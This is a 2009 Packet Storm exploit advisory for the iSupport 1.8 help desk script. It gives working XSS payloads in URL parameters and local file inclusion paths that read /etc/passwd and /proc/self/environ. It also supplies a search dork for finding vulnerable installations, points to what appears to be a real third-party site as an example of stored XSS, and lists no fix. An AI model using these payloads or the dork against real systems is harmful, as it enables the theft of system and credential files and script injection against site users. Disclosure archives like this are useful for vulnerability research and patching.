iSupport 1.8 XSS / Local File Inclusion

2009-12-16T00:00:00
ID PACKETSTORM:83920
Type packetstorm
Reporter EsSandRe
Modified 2009-12-16T00:00:00

Description

                                        
                                            `---------------------------------------------  
++ iSupport <= 1.8 ++  
XSS/Local File Include Exploit  
---------------------------------------------  
  
  
Discovered by : Stink' & Essandre  
DATE : 16/12/09  
  
//////////////////////////////////////////////////////////////////////  
  
Website : http://www.idevspot.com/  
DEMO : http://www.idevspot.com/demo/iSupport/  
DOWNLOAD : http://www.idevspot.com/iSupport.php => $  
  
//////////////////////////////////////////////////////////////////////  
  
  
[+] Vulnerability and Exploitation  
  
Dork : "Powered by [ iSupport 1.8 ]"  
  
  
--[XSS]--  
  
http://[TARGET]/[PATH]/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=[XSS]  
http://[TARGET]/[PATH]/function.php?which=[XSS]  
  
Exemple :  
http://server/helpdesk/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E  
http://serverhelpdesk/function.php?which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E  
  
--[XSS]-- in the member zone  
  
http://jvdominator.com/helpdesk/index.php?include_file=ticket_submit.php  
The flaw is in the form.  
In "Subject, Comments, etc. ..."  
After clicking "Submit Ticket" and you have your alert xss:)  
  
--[LFI]--  
  
http://[TARGET]/[PATH]/index.php?include_file=[LFI]  
  
Exemple :  
  
http://server/helpdesk/index.php?include_file=../../../../../proc/self/environ  
http://server/helpdesk/index.php?include_file=../../../../../etc/passwd  
  
  
[+] Solution :  
  
N/A  
  
The flaw is secure on some site, but we do not know if the publisher or persons using the scripts that are secure.  
  
`